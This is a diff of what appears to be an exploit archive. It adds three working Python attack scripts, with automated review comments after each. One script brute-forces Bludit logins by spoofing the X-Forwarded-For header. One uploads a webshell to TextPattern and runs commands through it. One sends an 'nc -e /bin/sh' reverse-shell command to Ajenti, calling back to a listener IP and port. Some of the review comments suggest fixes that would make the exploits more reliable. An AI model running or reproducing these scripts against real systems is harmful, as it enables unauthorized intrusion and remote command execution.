+Content-Disposition: form-data; name="amount"
+
+1
+-----------------------------10391575234966392972740129710--
+
+Step 3: Cookie will be reflected each time someone visits the Packages section.
\ No newline at end of file
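Review bot: The `package` and `description` parts (L531–L532, L535–L536) are empty, so the request as shown stores a blank package and demonstrates nothing; the advisory should state which of those fields is echoed without encoding on `index.php?page=packages` rather than leaving the reader to guess. The declared `Content-Length: 587` (L519) is larger than the printed body, consistent with the payload having been stripped, and the `laravel_session`/`XSRF-TOKEN` cookies on L523 belong to a different application. Add a one-line fix note, e.g. `# Fix: escape package name/description with htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') when rendering`.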
diff --git a/exploits/php/webapps/48942.py b/exploits/php/webapps/48942.py
new file mode 100755
index 000000000..8ceec4d0a
--- /dev/null
+++ b/exploits/php/webapps/48942.py
@@ -0,0 +1,102 @@
+#!/usr/bin/python3
+
+# Exploit
+## Title: Bludit <= 3.9.2 - Bruteforce Mitigation Bypass
+## Author: ColdFusionX (Mayank Deshmukh)
+## Author website: https://coldfusionx.github.io
+## Date: 2020-10-19
+## Vendor Homepage: https://www.bludit.com/
+## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz
+## Version: <= 3.9.2
+
+# Vulnerability
+## Discoverer: Rastating
+## Discoverer website: https://rastating.github.io/
+## CVE: CVE-2019-17240 https://nvd.nist.gov/vuln/detail/CVE-2019-17240
+## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
+## Patch: https://github.com/bludit/bludit/pull/1090
+
+'''
+Example Usage:
+- ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
+'''
+
+import requests
+import sys
+import re
+import argparse, textwrap
+from pwn import *
+
+#Expected Arguments
+parser = argparse.ArgumentParser(description="Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
+epilog=textwrap.dedent('''
+Exploit Usage :
+./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
+./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt'''))
+
+parser.add_argument("-l","--url", help="Path to Bludit (Example: http://127.0.0.1/admin/login.php)")
+parser.add_argument("-u","--userlist", help="Username Dictionary")
+parser.add_argument("-p","--passlist", help="Password Dictionary")
+args = parser.parse_args()
+
+if len(sys.argv) < 2:
+ print (f"Exploit Usage: ./exploit.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
+ sys.exit(1)
+
+# Variable
+LoginPage = args.url
+Username_list = args.userlist
+Password_list = args.passlist
+
+log.info('Bludit Auth BF Mitigation Bypass Script by ColdFusionX \n ')
+
+def login(Username,Password):
+ session = requests.session()
+ r = session.get(LoginPage)
+
+# Progress Check
+ process = log.progress('Brute Force')
+
+#Getting CSRF token value
+ CSRF = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)"', r.text)
+ CSRF = CSRF.group(1)
+
+#Specifying Headers Value
+ headerscontent = {
+ 'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
+ 'Referer' : f"{LoginPage}",
+ 'X-Forwarded-For' : f"{Password}"
+ }
+
+#POST REQ data
+ postreqcontent = {
+ 'tokenCSRF' : f"{CSRF}",
+ 'username' : f"{Username}",
+ 'password' : f"{Password}"
+ }
+
+#Sending POST REQ
+ r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)
+
+#Printing Username:Password
+ process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))
+
+#Conditional loops
+ if 'Location' in r.headers:
+ if "/admin/dashboard" in r.headers['Location']:
+ print()
+ log.info(f'SUCCESS !!')
+ log.success(f"Use Credential -> {Username}:{Password}")
+ sys.exit(0)
+ elif "has been blocked" in r.text:
+ log.failure(f"{Password} - Word BLOCKED")
+
+#Reading User.txt & Pass.txt files
+userfile = open(Username_list).readlines()
+for Username in userfile:
+ Username = Username.strip()
+
+passfile = open(Password_list).readlines()
+for Password in passfile:
+ Password = Password.strip()
+ login(Username,Password)
\ No newline at end of file
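Review bot: `CSRF = re.search(...)` on L611 returns `None` whenever the token input is absent — a patched Bludit, a different login page, or a non-200 response — and L612 then dies with an unhandled `AttributeError` instead of a message; guard it with `if CSRF is None: log.failure('tokenCSRF not found'); sys.exit(1)` before `.group(1)`. The two `open(...).readlines()` calls on L645 and L649 never close their handles; use `with open(...) as f:` or `pathlib.Path(...).read_text().splitlines()`. `log.progress('Brute Force')` is created inside `login()` (L608), so a fresh progress line starts on every call rather than once per run. The header (L562–L567) could also state that the bypass appears to depend on the server trusting the `X-Forwarded-For` header (L618), which is the condition defenders should verify in their own deployments.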
diff --git a/exploits/php/webapps/48943.py b/exploits/php/webapps/48943.py
new file mode 100755
index 000000000..4d4a46950
--- /dev/null
+++ b/exploits/php/webapps/48943.py
@@ -0,0 +1,158 @@
+#!/usr/bin/python3
+
+# Exploit Title: TextPattern <= 4.8.3 - Authenticated Remote Code Execution via Unrestricted File Upload
+# Google Dork: N/A
+# Date: 16/10/2020
+# Exploit Author: Michele '0blio_' Cisternino
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://github.com/textpattern/textpattern
+# Version: <= 4.8.3
+# Tested on: Kali Linux x64
+# CVE: N/A
+
+import sys
+import json
+import requests
+from bs4 import BeautifulSoup as bs4
+from time import sleep
+import random
+import string
+import readline
+
+# Disable SSL warnings
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Simple Terminal User Interface class I wrote to print run-time logs and headers
+class Tui ():
+ def __init__ (self):
+ self.red = '\033[91m'
+ self.green = '\033[92m'
+ self.blue = '\033[94m'
+ self.yellow = '\033[93m'
+ self.pink = '\033[95m'
+ self.end = '\033[0m'
+ self.bold = '\033[1m'
+
+ def header (self, software, author, cve='N/A'):
+ print ("\n", "{}Software:{} {}".format(self.pink, self.end, software), sep='')
+ print ("{}CVE:{} {}".format(self.pink, self.end, cve))
+ print ("{}Author:{} {}\n".format(self.pink, self.end, author))
+
+ def info (self, message):
+ print ("[{}*{}] {}".format(self.blue, self.end, message))
+
+ def greatInfo (self, message):
+ print ("[{}*{}] {}{}{}".format(self.blue, self.end, self.bold, message, self.end))
+
+ def success (self, message):
+ print ("[{}✓{}] {}{}{}".format(self.green, self.end, self.bold, message, self.end))
+
+ def warning (self, message):
+ print ("[{}!{}] {}".format(self.yellow, self.end, message))
+
+ def error (self, message):
+ print ("[{}✗{}] {}".format(self.red, self.end, message))
+
+log = Tui()
+log.header (software="TextPattern <= 4.8.3", cve="CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload", author="Michele '0blio_' Cisternino")
+
+if len(sys.argv) < 4:
+ log.info ("USAGE: python3 exploit.py http://target.com username password")
+ log.info ("EXAMPLE: python3 exploit.py http://localhost admin admin\n")
+ sys.exit()
+
+# Get input from the command line
+target, username, password = sys.argv[1:4]
+
+# Fixing URL
+target = target.strip()
+if not target.startswith("https://") and not target.startswith("http://"):
+ target = "http://" + target
+if not target.endswith("/"):
+ target = target + "/"
+
+accessData = {'p_userid':username, 'p_password':password, '_txp_token':""}
+
+# Login
+log.info ("Authenticating to the target as '{}'".format(username))
+s = requests.Session()
+try:
+ r = s.post(target + "textpattern/index.php", data=accessData, verify=False)
+ sleep(1)
+ if r.status_code == 200:
+ log.success ("Logged in as '{}' (Cookie: txp_login={}; txp_login_public={})".format(username, s.cookies['txp_login'], s.cookies['txp_login_public']))
+ sleep(1)
+
+ # Parsing the response to find the upload token inside the main json array
+ log.info ("Grabbing _txp_token (required to proceed with exploitation)..")
+ soup = bs4(r.text, 'html.parser')
+ scriptJS = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-2]
+ scriptJS = json.loads(scriptJS)
+ uploadToken = scriptJS['_txp_token']
+ log.greatInfo ("Upload token grabbed successfully ({})".format(uploadToken))
+
+ # The server reply with a 401 with the user provide wrong creds as input
+ elif r.status_code == 401:
+ log.error ("Unable to login. You provided wrong credentials..\n")
+ sys.exit()
+except requests.exceptions.ConnectionError:
+ log.error ("Unable to connect to the target!")
+ sys.exit()
+
+# Crafting the upload request here
+headers = {
+ "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "Accept" : "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
+ "Accept-Encoding" : "gzip, deflate",
+ "X-Requested-With" : "XMLHttpRequest",
+ "Connection" : "close",
+}
+
+# Generating random webshell name
+randomFilename = ''.join(random.choice(string.ascii_letters) for i in range(10)) + '.php'
+
+# Mapping multiparts here
+multipart_form_data = {
+ "fileInputOrder" : (None, '1/1'),
+ "app_mode" : (None, 'async'),
+ "MAX_FILE_SIZE" : (None, '2000000'),
+ "event" : (None, 'file'),
+ "step" : (None, 'file_insert'),
+ "id" : (None, ' '),
+ "_txp_token" : (None, uploadToken), # Token here
+ "thefile[]" : (randomFilename, '') # lol
+}
+
+# Uploading the webshell
+log.warning ("Sending payload..")
+
+try:
+ r = s.post (target + "textpattern/index.php?event=file", verify=False, headers=headers, files=multipart_form_data)
+ if "Files uploaded" in r.text:
+ log.success ("Webshell uploaded successfully as {}".format(randomFilename))
+except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+sleep(2)
+
+# Interact with the webshell (using the readline library to save the history of the executed commands at run-time)
+log.greatInfo ("Interacting with the HTTP webshell..")
+sleep (1)
+print()
+
+while 1:
+ try:
+ cmd = input ("\033[4m\033[91mwebshell\033[0m > ")
+ if cmd == 'exit':
+ raise KeyboardInterrupt
+ r = requests.get (target + "files/" + randomFilename + "?efcd=" + cmd, verify=False)
+ print (r.text)
+ except KeyboardInterrupt:
+ log.warning ("Stopped.")
+ exit()
+ except:
+ log.error ("Unexpected error..")
+ sys.exit()
+
+print()
\ No newline at end of file
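Review bot: The header on L670 says `# CVE: N/A` while the banner on L716 prints `CVE-2020-XXXXX`, so the script advertises a placeholder identifier that does not exist; make both say N/A until an id is assigned. The bare `except:` on L792 and L813 swallows every exception (at L792 even Ctrl-C) and reports only "Unexpected error.."; catch `requests.exceptions.RequestException` and print the exception so the failure reason is visible. On L742, `s.cookies['txp_login']` is indexed right after a 200 response without checking the cookie exists, which raises `KeyError` on a login page that returns 200 for a failed attempt; use `s.cookies.get('txp_login')` and treat a missing cookie as a login failure. The upload branch on L790 only logs success and silently continues when "Files uploaded" is absent, so the later loop runs against a file that may never have been created.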
diff --git a/exploits/python/webapps/48929.py b/exploits/python/webapps/48929.py
new file mode 100755
index 000000000..3529c82f8
--- /dev/null
+++ b/exploits/python/webapps/48929.py
@@ -0,0 +1,53 @@
+ #!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+import json
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) < 6:
+ print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
+ exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+req = requests.session()
+login_creds = {
+ "username":username,
+ "password":password,
+ "mode":"normal"}
+
+
+
+print("[+] Sendin login request...")
+login = req.post(url+"/api/core/auth", json = login_creds)
+
+
+if username in login.text:
+
+ page = url + "/api/terminal/create"
+
+ payload = {
+
+ 'command':'nc -e /bin/sh ' + ip + ' ' + port ,
+ 'autoclose':True
+
+
+ }
+ payload = json.dumps(payload)
+ print("[+] Sending payload...")
+
+ send_payload = req.post(page, payload)
+
+ print("[+] Check your listener !...")
+
+else:
+ print("[-] Wrong credentials or may the system patched.")
+ exit()
\ No newline at end of file
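Review bot: The terminal-create request at `send_payload = req.post(page, payload)` sends the `json.dumps` string as a raw form body with no JSON Content-Type, whereas the login to `/api/core/auth` uses `json=login_creds`; if the server parses the body by content type this second request may be rejected, and the script cannot tell because `send_payload` is never inspected before printing "Check your listener". Replace the two lines with `send_payload = req.post(page, json=payload)` (dropping the `json.dumps`) and add `print(send_payload.status_code, send_payload.text[:200])` so a failed create is visible. The success check `if username in login.text:` is also weak — an error response that echoes the submitted username would be treated as a successful login; checking `login.status_code == 200` together with parsing the JSON body would be more reliable, though the exact response shape is not visible here. `nc -e` is only available on some netcat builds (traditional nc/ncat, not OpenBSD nc), so the payload should be documented as such or made configurable. Finally, the shebang on the first line carries a leading space, which prevents direct execution via `./exploit.py` as the usage string suggests.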
diff --git a/files_exploits.csv b/files_exploits.csv
index ab5e87ad1..dfcd07756 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40746,6 +40746,22 @@ id,file,description,date,author,type,platform,port
48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
+48928,exploits/php/webapps/48928.txt,"Online Library Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,
+48930,exploits/php/webapps/48930.txt,"Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48931,exploits/php/webapps/48931.txt,"Car Rental Management System 1.0 - Arbitrary File Upload",2020-10-23,"Jyotsna Adhana",webapps,php,
+48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,
+48933,exploits/php/webapps/48933.txt,"Point of Sales 1.0 - 'id' SQL Injection",2020-10-23,"Ankita Pal",webapps,php,
+48934,exploits/php/webapps/48934.txt,"Lot Reservation Management System 1.0 - Authentication Bypass",2020-10-23,"Ankita Pal",webapps,php,
+48935,exploits/php/webapps/48935.txt,"Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)",2020-10-23,"Ankita Pal",webapps,php,
+48936,exploits/php/webapps/48936.txt,"Gym Management System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48937,exploits/php/webapps/48937.txt,"Point of Sales 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48938,exploits/php/webapps/48938.txt,"School Faculty Scheduling System 1.0 - 'id' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48939,exploits/php/webapps/48939.txt,"School Faculty Scheduling System 1.0 - 'username' SQL Injection",2020-10-23,"Jyotsna Adhana",webapps,php,
+48940,exploits/php/webapps/48940.txt,"Gym Management System 1.0 - Authentication Bypass",2020-10-23,"Jyotsna Adhana",webapps,php,
+48941,exploits/php/webapps/48941.txt,"Gym Management System 1.0 - Stored Cross Site Scripting",2020-10-23,"Jyotsna Adhana",webapps,php,
+48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,
+48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,